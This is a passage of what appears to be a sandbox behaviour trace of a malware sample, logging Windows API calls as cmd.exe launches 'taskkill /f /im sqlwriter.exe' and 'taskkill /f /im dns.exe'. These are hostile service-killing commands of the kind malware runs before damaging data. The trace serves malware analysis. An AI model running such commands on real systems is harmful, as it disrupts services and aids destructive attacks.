returned 0x409 [0056.419] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xe1f82c, cchData=8 | out: lpLCData=":") returned 2 [0056.419] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0xd1fcb4, cchData=128 | out: lpLCData="0") returned 2 [0056.419] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0xd1fcb4, cchData=128 | out: lpLCData="0") returned 2 [0056.419] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0xd1fcb4, cchData=128 | out: lpLCData="1") returned 2 [0056.419] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xe1f81c, cchData=8 | out: lpLCData="/") returned 2 [0056.419] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xe1f7b8, cchData=32 | out: lpLCData="Mon") returned 4 [0056.419] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xe1f778, cchData=32 | out: lpLCData="Tue") returned 4 [0056.419] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xe1f738, cchData=32 | out: lpLCData="Wed") returned 4 [0056.419] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xe1f6f8, cchData=32 | out: lpLCData="Thu") returned 4 [0056.419] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xe1f6b8, cchData=32 | out: lpLCData="Fri") returned 4 [0056.419] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xe1f678, cchData=32 | out: lpLCData="Sat") returned 4 [0056.419] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xe1f638, cchData=32 | out: lpLCData="Sun") returned 4 [0056.419] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xe1f80c, cchData=8 | out: lpLCData=".") returned 2 [0056.419] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xe1f7f8, cchData=8 | out: lpLCData=",") returned 2 [0056.419] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0056.421] GetProcessHeap () returned 0x2e70000 [0056.421] RtlAllocateHeap (HeapHandle=0x2e70000, Flags=0x0, Size=0x20c) returned 0x2e77840 [0056.421] GetConsoleTitleW (in: lpConsoleTitle=0x2e77840, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1c [0056.591] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75e90000 [0056.591] GetProcAddress (hModule=0x75e90000, lpProcName="CopyFileExW") returned 0x75ea4330 [0056.591] GetProcAddress (hModule=0x75e90000, lpProcName="IsDebuggerPresent") returned 0x75ea5930 [0056.591] GetProcAddress (hModule=0x75e90000, lpProcName="SetConsoleInputExeNameW") returned 0x74fe09d0 [0056.591] ??_V@YAXPAX@Z () returned 0x1 [0056.592] GetProcessHeap () returned 0x2e70000 [0056.592] RtlAllocateHeap (HeapHandle=0x2e70000, Flags=0x8, Size=0x400a) returned 0x2e78d68 [0056.592] GetProcessHeap () returned 0x2e70000 [0056.592] RtlFreeHeap (HeapHandle=0x2e70000, Flags=0x0, BaseAddress=0x2e78d68) returned 1 [0056.593] _wcsicmp (_String1="taskkill.exe", _String2=")") returned 75 [0056.593] _wcsicmp (_String1="FOR", _String2="taskkill.exe") returned -14 [0056.593] _wcsicmp (_String1="FOR/?", _String2="taskkill.exe") returned -14 [0056.593] _wcsicmp (_String1="IF", _String2="taskkill.exe") returned -11 [0056.593] _wcsicmp (_String1="IF/?", _String2="taskkill.exe") returned -11 [0056.593] _wcsicmp (_String1="REM", _String2="taskkill.exe") returned -2 [0056.593] _wcsicmp (_String1="REM/?", _String2="taskkill.exe") returned -2 [0056.593] GetProcessHeap () returned 0x2e70000 [0056.593] RtlAllocateHeap (HeapHandle=0x2e70000, Flags=0x8, Size=0x58) returned 0x2e77a58 [0056.593] GetProcessHeap () returned 0x2e70000 [0056.593] RtlAllocateHeap (HeapHandle=0x2e70000, Flags=0x8, Size=0x22) returned 0x2e77ab8 [0056.594] GetProcessHeap () returned 0x2e70000 [0056.594] RtlAllocateHeap (HeapHandle=0x2e70000, Flags=0x8, Size=0x46) returned 0x2e77ae8 [0056.594] GetConsoleTitleW (in: lpConsoleTitle=0xd1fba8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1c [0056.684] malloc (_Size=0xffce) returned 0x33e2638 [0056.684] ??_V@YAXPAX@Z () returned 0xd1f934 [0056.685] malloc (_Size=0xffce) returned 0x33f2610 [0056.685] ??_V@YAXPAX@Z () returned 0xd1f6ec [0056.686] GetFileAttributesW (lpFileName="taskkill.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\taskkill.exe")) returned 0xffffffff [0056.686] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0056.686] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0056.686] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0056.686] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0056.686] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0056.686] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0056.686] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0056.687] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0056.687] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0056.687] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0056.687] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0056.687] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0056.687] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0056.687] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0056.687] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0056.687] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0056.687] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0056.687] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0056.687] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0056.687] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0056.687] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0056.687] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0056.687] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0056.687] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0056.687] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0056.687] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0056.687] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0056.687] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0056.687] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0056.687] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0056.687] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0056.687] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0056.687] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0056.687] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0056.687] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0056.687] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0056.687] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0056.687] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0056.687] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0056.687] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0056.687] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0056.688] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0056.688] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0056.688] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0056.688] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0056.688] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0056.688] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0056.688] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0056.688] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0056.688] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0056.688] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0056.688] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0056.688] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0056.688] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0056.688] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0056.688] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0056.688] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0056.688] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0056.688] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0056.688] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0056.688] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0056.688] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0056.688] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0056.688] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0056.688] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0056.688] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0056.688] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0056.688] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0056.688] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0056.688] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0056.688] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0056.688] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0056.688] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0056.688] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0056.688] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0056.688] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0056.689] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0056.689] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0056.689] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0056.689] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0056.689] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0056.689] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0056.689] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0056.689] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0056.689] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0056.689] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0056.689] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0056.689] ??_V@YAXPAX@Z () returned 0x1 [0056.689] GetProcessHeap () returned 0x2e70000 [0056.689] RtlAllocateHeap (HeapHandle=0x2e70000, Flags=0x8, Size=0xffd6) returned 0x2e78d68 [0056.690] GetProcessHeap () returned 0x2e70000 [0056.690] RtlAllocateHeap (HeapHandle=0x2e70000, Flags=0x8, Size=0x60) returned 0x2e77b38 [0056.690] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0056.690] malloc (_Size=0xffce) returned 0x33f2610 [0056.690] ??_V@YAXPAX@Z () returned 0xd1f46c [0056.691] GetProcessHeap () returned 0x2e70000 [0056.691] RtlAllocateHeap (HeapHandle=0x2e70000, Flags=0x8, Size=0x1ffa4) returned 0x2e88d48 [0056.693] SetErrorMode (uMode=0x0) returned 0x0 [0056.693] SetErrorMode (uMode=0x1) returned 0x0 [0056.693] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x2e88d50, lpFilePart=0xd1f48c | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xd1f48c*="Desktop") returned 0x17 [0056.693] SetErrorMode (uMode=0x0) returned 0x1 [0056.693] GetProcessHeap () returned 0x2e70000 [0056.693] RtlReAllocateHeap (Heap=0x2e70000, Flags=0x0, Ptr=0x2e88d48, Size=0x52) returned 0x2e88d48 [0056.693] GetProcessHeap () returned 0x2e70000 [0056.693] RtlSizeHeap (HeapHandle=0x2e70000, Flags=0x0, MemoryPointer=0x2e88d48) returned 0x52 [0056.693] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xe1f840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0056.693] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0056.693] GetProcessHeap () returned 0x2e70000 [0056.693] RtlAllocateHeap (HeapHandle=0x2e70000, Flags=0x8, Size=0x1b4) returned 0x2e77ba0 [0056.693] GetProcessHeap () returned 0x2e70000 [0056.693] RtlAllocateHeap (HeapHandle=0x2e70000, Flags=0x8, Size=0x360) returned 0x2e77d60 [0056.698] GetProcessHeap () returned 0x2e70000 [0056.698] RtlReAllocateHeap (Heap=0x2e70000, Flags=0x0, Ptr=0x2e77d60, Size=0x1b6) returned 0x2e77d60 [0056.698] GetProcessHeap () returned 0x2e70000 [0056.698] RtlSizeHeap (HeapHandle=0x2e70000, Flags=0x0, MemoryPointer=0x2e77d60) returned 0x1b6 [0056.698] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xe1f840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0056.698] GetProcessHeap () returned 0x2e70000 [0056.699] RtlAllocateHeap (HeapHandle=0x2e70000, Flags=0x8, Size=0xe0) returned 0x2e77f20 [0056.699] GetProcessHeap () returned 0x2e70000 [0056.699] RtlReAllocateHeap (Heap=0x2e70000, Flags=0x0, Ptr=0x2e77f20, Size=0x76) returned 0x2e77f20 [0056.699] GetProcessHeap () returned 0x2e70000 [0056.699] RtlSizeHeap (HeapHandle=0x2e70000, Flags=0x0, MemoryPointer=0x2e77f20) returned 0x76 [0056.699] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0056.699] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\taskkill.exe", fInfoLevelId=0x1, lpFindFileData=0xd1f238, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xd1f238) returned 0xffffffff [0056.699] GetLastError () returned 0x2 [0056.700] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\taskkill.exe.*", fInfoLevelId=0x1, lpFindFileData=0xd1f218, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xd1f218) returned 0xffffffff [0056.700] GetLastError () returned 0x2 [0056.700] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0056.700] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\taskkill.exe", fInfoLevelId=0x1, lpFindFileData=0xd1f238, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xd1f238) returned 0xffffffff [0056.700] GetLastError () returned 0x2 [0056.700] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\taskkill.exe.*", fInfoLevelId=0x1, lpFindFileData=0xd1f218, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xd1f218) returned 0xffffffff [0056.700] GetLastError () returned 0x2 [0056.700] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0056.700] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\taskkill.exe", fInfoLevelId=0x1, lpFindFileData=0xd1f238, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xd1f238) returned 0x2e77fa0 [0056.701] GetProcessHeap () returned 0x2e70000 [0056.701] RtlAllocateHeap (HeapHandle=0x2e70000, Flags=0x0, Size=0x14) returned 0x2e77fe0 [0056.701] FindClose (in: hFindFile=0x2e77fa0 | out: hFindFile=0x2e77fa0) returned 1 [0056.701] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0056.701] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0056.701] ??_V@YAXPAX@Z () returned 0x1 [0056.701] GetConsoleTitleW (in: lpConsoleTitle=0xd1f71c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1c [0056.809] InitializeProcThreadAttributeList (in: lpAttributeList=0xd1f648, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xd1f634 | out: lpAttributeList=0xd1f648, lpSize=0xd1f634) returned 1 [0056.809] UpdateProcThreadAttribute (in: lpAttributeList=0xd1f648, dwFlags=0x0, Attribute=0x60001, lpValue=0xd1f630, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xd1f648, lpPreviousValue=0x0) returned 1 [0056.809] GetStartupInfoW (in: lpStartupInfo=0xd1f680 | out: lpStartupInfo=0xd1f680*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0056.809] GetProcessHeap () returned 0x2e70000 [0056.809] RtlAllocateHeap (HeapHandle=0x2e70000, Flags=0x8, Size=0x18) returned 0x2e77fa0 [0056.809] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0056.809] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0056.809] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0056.809] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0056.809] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0056.809] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0056.809] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0056.810] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0056.810] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0056.810] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0056.810] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0056.810] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0056.810] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0056.810] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0056.810] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0056.810] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0056.810] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0056.810] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0056.810] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0056.810] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0056.810] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0056.810] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0056.810] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0056.810] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0056.810] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0056.810] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0056.810] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0056.810] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0056.810] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0056.810] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0056.810] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0056.810] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0056.810] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0056.810] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0056.810] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0056.810] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0056.810] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0056.810] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0056.810] GetProcessHeap () returned 0x2e70000 [0056.810] RtlFreeHeap (HeapHandle=0x2e70000, Flags=0x0, BaseAddress=0x2e77fa0) returned 1 [0056.810] GetProcessHeap () returned 0x2e70000 [0056.811] RtlAllocateHeap (HeapHandle=0x2e70000, Flags=0x8, Size=0xa) returned 0x2e77fa0 [0056.811] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0056.812] _get_osfhandle (_FileHandle=1) returned 0x90 [0056.812] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x3) returned 1 [0056.903] _get_osfhandle (_FileHandle=0) returned 0x8c [0056.903] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1f7) returned 1 [0056.980] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\taskkill.exe", lpCommandLine="taskkill.exe taskkill /f /im sqlwriter.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0xd1f5d0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill.exe taskkill /f /im sqlwriter.exe", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xd1f61c | out: lpCommandLine="taskkill.exe taskkill /f /im sqlwriter.exe", lpProcessInformation=0xd1f61c*(hProcess=0xe0, hThread=0xdc, dwProcessId=0xf58, dwThreadId=0xe38)) returned 1 [0056.998] CloseHandle (hObject=0xdc) returned 1 [0056.998] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0056.998] GetProcessHeap () returned 0x2e70000 [0056.998] RtlFreeHeap (HeapHandle=0x2e70000, Flags=0x0, BaseAddress=0x2e76c60) returned 1 [0056.999] GetEnvironmentStringsW () returned 0x2e76c60* [0056.999] GetProcessHeap () returned 0x2e70000 [0056.999] RtlAllocateHeap (HeapHandle=0x2e70000, Flags=0x8, Size=0xb1a) returned 0x2e74bd8 [0056.999] FreeEnvironmentStringsA (penv="=") returned 1 [0056.999] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0065.121] GetExitCodeProcess (in: hProcess=0xe0, lpExitCode=0xd1f5b4 | out: lpExitCode=0xd1f5b4*=0x1) returned 1 [0065.122] CloseHandle (hObject=0xe0) returned 1 [0065.122] _vsnwprintf (in: _Buffer=0xd1f69c, _BufferCount=0x13, _Format="%08X", _ArgList=0xd1f5bc | out: _Buffer="00000001") returned 8 [0065.122] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0065.123] GetProcessHeap () returned 0x2e70000 [0065.123] RtlFreeHeap (HeapHandle=0x2e70000, Flags=0x0, BaseAddress=0x2e74bd8) returned 1 [0065.123] GetEnvironmentStringsW () returned 0x2e78218* [0065.124] GetProcessHeap () returned 0x2e70000 [0065.124] RtlAllocateHeap (HeapHandle=0x2e70000, Flags=0x8, Size=0xb40) returned 0x2e74bd8 [0065.124] FreeEnvironmentStringsA (penv="=") returned 1 [0065.124] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0065.124] GetProcessHeap () returned 0x2e70000 [0065.124] RtlFreeHeap (HeapHandle=0x2e70000, Flags=0x0, BaseAddress=0x2e74bd8) returned 1 [0065.124] GetEnvironmentStringsW () returned 0x2e78218* [0065.124] GetProcessHeap () returned 0x2e70000 [0065.124] RtlAllocateHeap (HeapHandle=0x2e70000, Flags=0x8, Size=0xb40) returned 0x2e74bd8 [0065.124] FreeEnvironmentStringsA (penv="=") returned 1 [0065.124] GetProcessHeap () returned 0x2e70000 [0065.124] RtlFreeHeap (HeapHandle=0x2e70000, Flags=0x0, BaseAddress=0x2e77fa0) returned 1 [0065.124] DeleteProcThreadAttributeList (in: lpAttributeList=0xd1f648 | out: lpAttributeList=0xd1f648) [0065.124] ??_V@YAXPAX@Z () returned 0x1 [0065.124] _get_osfhandle (_FileHandle=1) returned 0x90 [0065.124] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x3) returned 1 [0065.330] _get_osfhandle (_FileHandle=1) returned 0x90 [0065.335] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0xe23890 | out: lpMode=0xe23890) returned 1 [0065.404] _get_osfhandle (_FileHandle=1) returned 0x90 [0065.421] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x7) returned 1 [0065.515] _get_osfhandle (_FileHandle=0) returned 0x8c [0065.515] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xe23894 | out: lpMode=0xe23894) returned 1 [0065.612] _get_osfhandle (_FileHandle=0) returned 0x8c [0065.612] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1e7) returned 1 [0065.699] SetConsoleInputExeNameW () returned 0x1 [0065.699] GetConsoleOutputCP () returned 0x1b5 [0065.826] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe23850 | out: lpCPInfo=0xe23850) returned 1 [0065.826] SetThreadUILanguage (LangId=0x0) returned 0x31f0409 [0065.922] exit (_Code=1) [0065.922] ??_V@YAXPAX@Z () returned 0x1 Thread: id = 73 os_tid = 0xec4 Process: id = "18" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x71e1000" os_pid = "0x6cc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "17" os_parent_pid = "0xb84" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "64" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000103c1" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 66 os_tid = 0xe98 Thread: id = 67 os_tid = 0x490 Thread: id = 68 os_tid = 0xcfc Thread: id = 70 os_tid = 0x9d8 Thread: id = 71 os_tid = 0xa5c Process: id = "19" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x7be48000" os_pid = "0x770" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "14" os_parent_pid = "0xcb8" cmd_line = "taskkill.exe taskkill /f /im dns.exe" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT 